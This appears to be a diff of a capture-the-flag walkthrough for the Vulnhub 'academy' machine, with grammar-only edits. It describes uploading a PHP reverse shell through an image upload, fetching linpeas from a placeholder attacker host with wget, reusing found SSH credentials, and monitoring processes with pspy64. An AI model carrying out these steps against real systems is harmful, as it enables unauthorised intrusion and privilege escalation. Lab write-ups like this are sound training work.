ImNob0dy/Notes/Vulnhub/academy/Walkthrough.md

 Successfully logged inn
 ```
 Now, after successful login I've observed there's a my-profile page where we can upload an image.
 (But instead of image I uploaded an php reverse shell).
-Note: before uploading the php reverse shell open an netcat listener.
+Note: before uploading the php reverse shell open a netcat listener.

 Now, after the successful reverse shell.
 I thought of privilege escalation but we have limited access.

 So, I executed "linpeas.sh"

-I downloaded linpeas and opened an python3 http.server
+I downloaded linpeas and opened a python3 http.server
 - Command: wget http://<attacker Ip>:<port>/linpeas.sh

 After, executing linpeas.sh I found an user name "grimmie" and his password "My_V3ryS3cur3_P4ss".

 Performed ssh : ssh grimmie@<target ip>

-Found a box backup.sh
+Found a file backup.sh
 Info: while performing linpeas.sh I didn't find any cronjobs in the machine.

 So, in order to check any automated files running on the system I downloaded pspy64 tool.
 This tools helps to monitor all the processes which are running on the system without root access.